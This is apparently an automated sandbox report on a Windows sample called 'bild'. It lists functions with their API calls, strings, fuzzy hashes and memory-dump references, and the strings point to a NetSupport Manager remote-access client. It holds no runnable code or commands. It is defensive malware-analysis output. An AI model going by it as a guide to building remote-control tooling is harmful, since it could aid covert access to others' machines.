Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790

Function 11005190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1100519E
_memset.LIBCMT ref: 110051C0
GetMenuItemID.USER32(?,00000000), ref: 110051D4
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294

Strings

0, xrefs: 110051CD

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60

Function 1101D1B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D1E0
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
_memset.LIBCMT ref: 1101D20A
RegisterClassExA.USER32(?), ref: 1101D24B
CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
GetWindowRect.USER32(00000000,?), ref: 1101D28B
DestroyWindow.USER32(00000000), ref: 1101D292

Strings

NSMChatSizeWnd, xrefs: 1101D1EC, 1101D241, 1101D278

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64

Function 1103D160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1103D18F
GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
CloseHandle.KERNEL32(?), ref: 1103D25C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
CloseHandle.KERNEL32(?), ref: 1103D279

Strings

RunAnnot, xrefs: 1103D177
/247, xrefs: 1103D20A
" /a, xrefs: 1103D1DF

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
String ID: /247$" /a$RunAnnot
API String ID: 2581068044-4059077130
Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90

Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90

Function 11113150 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000007), ref: 11113167
SelectObject.GDI32(00000000,00000000), ref: 11113176
SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
GetStockObject.GDI32(00000000), ref: 11113189
SelectObject.GDI32(?,00000000), ref: 11113192
GetStockObject.GDI32(0000000D), ref: 11113196
SelectObject.GDI32(00000000,00000000), ref: 1111319F
SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
SelectClipRgn.GDI32(?,?), ref: 111131D5

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Object$Select$Stock$Clip$Brush
String ID:
API String ID: 2690518013-0
Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60

Function 11027030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
TranslateMessage.USER32(?), ref: 11027081
DispatchMessageA.USER32(?), ref: 1102708B
Sleep.KERNEL32(000003E8), ref: 11027114
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A

Strings

Bridge, xrefs: 11027037
BridgeThread::Attempting to open bridge..., xrefs: 110270CE, 11027116

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$DispatchSleepTranslate
String ID: Bridge$BridgeThread::Attempting to open bridge...
API String ID: 3237117195-3850961587
Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0

Function 110B90A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

Norm, xrefs: 110B90B0
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B90CA
m_hWnd, xrefs: 110B90CF
j CB::OnRemoteSizeNormal(%d, %d, %d, %d), xrefs: 110B9170

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
API String ID: 1092798621-1973987134
Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90

Function 1112B340 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC

LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
_calloc.LIBCMT ref: 1112B3AD
_free.LIBCMT ref: 1112B44B
FreeLibrary.KERNEL32(00000000), ref: 1112B462

Strings

ntohl, xrefs: 1112B39C
ws2_32.dll, xrefs: 1112B385

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad$_calloc_free
String ID: ntohl$ws2_32.dll
API String ID: 2881363997-4165132517
Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4

Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

SetForegroundWindow.USER32(?), ref: 1115F12E

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

SystemParametersInfoA.USER32(00002000,00000000,00000000,00000000), ref: 1115F14F
SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
SetForegroundWindow.USER32(?), ref: 1115F162
SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F177

Strings

..\ctl32\wndclass.cpp, xrefs: 1115F112
m_hWnd, xrefs: 1115F117

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\wndclass.cpp$m_hWnd
API String ID: 3960414890-2201682149
Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1

Function 11003380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
GetSubMenu.USER32(00000000,00000000), ref: 110033BA
GetSubMenu.USER32(00000000,00000000), ref: 110033DC
DestroyMenu.USER32(00000000), ref: 110033EA

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

hSub, xrefs: 110033CC
..\CTL32\annotate.cpp, xrefs: 1100339F, 110033C7
hMenu, xrefs: 110033A4

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA

Function 11119160 Relevance: 12.2, APIs: 8, Instructions: 209COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,00000000), ref: 11119200
ClientToScreen.USER32(?,?), ref: 11119241
GetCursorPos.USER32(?), ref: 111192A1
GetTickCount.KERNEL32 ref: 111192B6
GetTickCount.KERNEL32 ref: 11119337
WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
WindowFromPoint.USER32(000000FF,?), ref: 111193AE
SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
